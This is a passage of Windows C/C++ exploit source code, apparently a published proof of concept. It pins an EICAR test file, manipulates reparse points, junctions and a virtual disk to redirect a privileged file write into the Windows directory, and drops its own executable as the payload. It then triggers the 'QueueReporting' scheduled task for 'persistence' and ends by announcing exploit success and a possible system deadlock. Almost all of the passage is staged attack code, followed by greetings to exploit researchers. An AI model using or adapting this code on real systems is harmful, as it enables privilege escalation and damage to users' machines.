OBJECT_ATTRIBUTES eicarpathobjattr = { 0 };
InitializeObjectAttributes(&eicarpathobjattr, &_eicarpath, OBJ_CASE_INSENSITIVE, NULL, NULL);
iostat = { 0 };
stat = NtCreateFile(&heicar2, GENERIC_READ, &eicarpathobjattr, &iostat, NULL, FILE_ATTRIBUTE_NORMAL,
FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, FILE_OPEN, NULL, NULL, NULL);
if (stat) {
printf("[!] Failed to open file: %ws, error: 0x%0.8X\n", eicarpath, stat);
return 1;
}
wchar_t newfpath[MAX_PATH] = { 0 };
wcscpy(newfpath, maindirname);
wcscat(newfpath, L"\\");
do {
ZeroMemory(buff, sizeof(buff));
DWORD retbytes = 0;
ReadDirectoryChangesW(hdirtmp, buff, sizeof(buff), TRUE,
FILE_NOTIFY_CHANGE_SIZE, &retbytes, NULL, NULL);
PFILE_NOTIFY_INFORMATION pfni = (PFILE_NOTIFY_INFORMATION)buff;
wcscat(newfpath, &pfni->FileName[0]);
break;
} while (1);
if (!LockFile(heicar2, NULL, NULL, MAXDWORD, MAXDWORD)) {
printf("[!] Failed to lock EICAR file, error: %d\n", GetLastError());
return 1;
}
CloseHandle(hwin);
REPARSE_GUID_DATA_BUFFER rp_buffer = { 0 };
rp_buffer.ReparseTag = IO_REPARSE_TAG_MOUNT_POINT;
DWORD cb2 = 0;
OVERLAPPED ov = { 0 };
HANDLE hevent = CreateEvent(NULL, FALSE, FALSE, NULL);
ov.hEvent = hevent;
DeviceIoControl(hdir, FSCTL_DELETE_REPARSE_POINT, &rp_buffer, REPARSE_GUID_DATA_BUFFER_HEADER_SIZE,
nullptr, 0, &cb2, &ov);
CloseHandle(ov.hEvent);
printf("[*] Stage 8: Writing payload...\n");
HANDLE htempfile = NULL;
UNICODE_STRING _newfpath = { 0 };
RtlInitUnicodeString(&_newfpath, newfpath);
OBJECT_ATTRIBUTES newfpathobjattr = { 0 };
InitializeObjectAttributes(&newfpathobjattr, &_newfpath, OBJ_CASE_INSENSITIVE, NULL, NULL);
iostat = { 0 };
stat = NtCreateFile(&htempfile, GENERIC_READ | GENERIC_WRITE | DELETE, &newfpathobjattr, &iostat,
NULL, FILE_ATTRIBUTE_NORMAL, FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
FILE_OVERWRITE_IF, NULL, NULL, NULL);
if (stat) {
printf("[!] Failed to open file: %ws, error: 0x%0.8X\n", newfpath, stat);
return 1;
}
HMODULE module = GetModuleHandle(NULL);
wchar_t mx[MAX_PATH] = { 0 };
GetModuleFileName(module, mx, MAX_PATH);
HANDLE hself = CreateFile(mx, GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if (!hself || hself == INVALID_HANDLE_VALUE) {
printf("[!] Failed to open current executable, error: %d\n", GetLastError());
return 1;
}
DWORD readbytes = 0;
LARGE_INTEGER li = { 0 };
GetFileSizeEx(hself, &li);
void* exebuff = malloc(li.QuadPart);
if (!ReadFile(hself, exebuff, li.QuadPart, &readbytes, NULL)) {
printf("[!] Failed to read current executable binary, error: %d\n", GetLastError());
return 1;
}
CloseHandle(hself);
readbytes = 0;
OVERLAPPED ovp = { 0 };
ovp.hEvent = CreateEvent(NULL, FALSE, FALSE, NULL);
if (WriteFile(htempfile, exebuff, li.QuadPart, &readbytes, &ovp) == ERROR_IO_PENDING) {
printf("[!] Failed to write payload file, error: %d\n", GetLastError());
return 1;
}
WaitForSingleObject(ovp.hEvent, INFINITE);
CloseHandle(ovp.hEvent);
free(exebuff);
printf("[*] Stage 9: Finalizing and detaching...\n");
CloseHandle(heicar2);
MoveToTempDir(htempfile);
MoveToTempDir(hdirtmp);
MoveToTempDir(hdir);
HANDLE hparent = NULL;
UNICODE_STRING _workdir = { 0 };
RtlInitUnicodeString(&_workdir, workdir2);
OBJECT_ATTRIBUTES workdirobjattr = { 0 };
InitializeObjectAttributes(&workdirobjattr, &_workdir, OBJ_CASE_INSENSITIVE, NULL, NULL);
iostat = { 0 };
stat = NtCreateFile(&hparent, FILE_WRITE_ATTRIBUTES, &workdirobjattr, &iostat, NULL, NULL,
FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, FILE_OPEN,
FILE_DIRECTORY_FILE, NULL, NULL);
if (stat) {
printf("[!] Failed to open file: %ws, error: 0x%0.8X\n", workdir2, stat);
return 1;
}
wchar_t __tmp[MAX_PATH] = { 0 };
GetWindowsDirectory(__tmp, MAX_PATH);
wchar_t dest[MAX_PATH] = { L"\\??\\" };
wcscat(dest, __tmp);
if (!CreateJunction(hparent, dest)) {
return 1;
}
CloseHandle(hparent);
CloseHandle(hdirtmp);
CloseHandle(hdir);
DetachVirtualDisk(hvirtdisk, DETACH_VIRTUAL_DISK_FLAG_NONE, NULL);
CloseHandle(hvirtdisk);
WaitForSingleObject(hthread, INFINITE);
CloseHandle(hthread);
CloseHandle(htempfile);
g_poseidonexit = true;
Sleep(500);
printf("[*] Stage 11: Triggering persistence...\n");
HRESULT hr = S_OK;
ITaskService* pTaskSvc = NULL;
hr = CoInitialize(NULL);
if (SUCCEEDED(hr)) {
hr = CoCreateInstance(CLSID_TaskScheduler, NULL, CLSCTX_INPROC_SERVER,
IID_ITaskService, (void**)&pTaskSvc);
if (FAILED(hr)) {
printf("[!] Failed to initialize task scheduler COM server.\n");
CoUninitialize();
return 1;
}
} else {
return 1;
}
hr = pTaskSvc->Connect(_variant_t(), _variant_t(), _variant_t(), _variant_t());
if (hr) {
printf("[!] Failed to connect to task scheduler service, error: 0x%0.8X\n", hr);
return 1;
}
ITaskFolder* taskfolder = NULL;
hr = pTaskSvc->GetFolder((BSTR)L"\\Microsoft\\Windows\\Windows Error Reporting", &taskfolder);
if (hr) {
printf("[!] Failed to get task scheduler folder, error: 0x%0.8X\n", hr);
return 1;
}
IRegisteredTask* taskex = NULL;
hr = taskfolder->GetTask((BSTR)L"QueueReporting", &taskex);
if (hr) {
printf("[!] Failed to obtain task object, error: 0x%0.8X\n", hr);
return 1;
}
IRunningTask* runningtask = NULL;
hr = taskex->Run(_variant_t(), &runningtask);
if (hr) {
printf("[!] Failed to run scheduled task, error: 0x%0.8X\n", hr);
return 1;
}
if (!ConnectNamedPipe(hpipe, NULL)) {
printf("[!] ConnectNamedPipe failed, error: %d\n", GetLastError());
return 1;
}
printf("\n============================================================\n");
printf(" [!!] EXPLOIT SUCCESSFUL\n");
printf(" System should now be in a frozen/deadlocked state.\n");
printf(" Some drivers may fail to load on next boot.\n");
printf("============================================================\n\n");
runningtask->Release();
taskex->Release();
taskfolder->Release();
pTaskSvc->Release();
CoUninitialize();
return 0;
}
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================